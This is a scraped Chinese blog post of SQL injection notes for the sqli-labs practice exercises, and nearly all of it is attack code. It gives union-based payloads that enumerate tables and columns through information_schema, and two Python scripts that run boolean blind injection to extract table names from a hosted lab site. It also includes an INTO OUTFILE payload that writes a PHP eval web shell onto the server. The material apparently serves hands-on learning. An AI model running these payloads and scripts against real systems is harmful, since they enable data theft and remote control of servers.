zoukankan      html  css  js  c++  java
  • sql注入

    关于sql注入

    • sql注入的前要

      • 没有对用户的输入进行过滤,和对sql语句的预编译

    select group_concat(table_name) from information_schema.tables where table_schema=database()
    ?id=-1") union  select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23

    ?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

    ?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23
    import requests
    import time
    for i in range(0,100):
       if(i%10==0):
           time.sleep(1)
       url = "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
       res = requests.get(url)
       if (len(res.content) == 704):
           print(",",end="")
           continue
       for e in range(ord("a"), ord("z") + 1):
           url="https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
           res=requests.get(url)

           if (len(res.content) == 704):
               print(chr(e), end="")
               break
    ?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
    py 脚本同上


    @@datadir 读取数据库路径
    @@basedir MYSQL 获取安装路径
    http://localhost/sqli-labs-master/Less-7/?id=-1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'C:/AppServ/www/data.txt' %23
    import requests
    import time
    #706 正确的长度
    for i in range(0,100):
       url = "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
       res = requests.get(url)
       time.sleep(1)
       if (len(res.content) == 706):
           print(",",end="")
           continue
       for e in range(ord("a"), ord("z") + 1):
           url="https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
           res=requests.get(url)
           time.sleep(1)
           if (len(res.content) == 706):
               print(chr(e), end="")
               break



  • 相关阅读:
    Yii1.1应用升级到Yii2.0的一些注意点
    js经常使用功能代码
    P3370 【模板】字符串哈希
    poj 2406 Power Strings 周期问题
    P1325 雷达安装
    P1809 过河问题_NOI导刊2011提高(01)
    P1791 线段覆盖
    田忌赛马
    1225 八数码难题
    P1115 最大子段和
  • 原文地址:https://www.cnblogs.com/hackering/p/14232300.html
Copyright © 2011-2022 走看看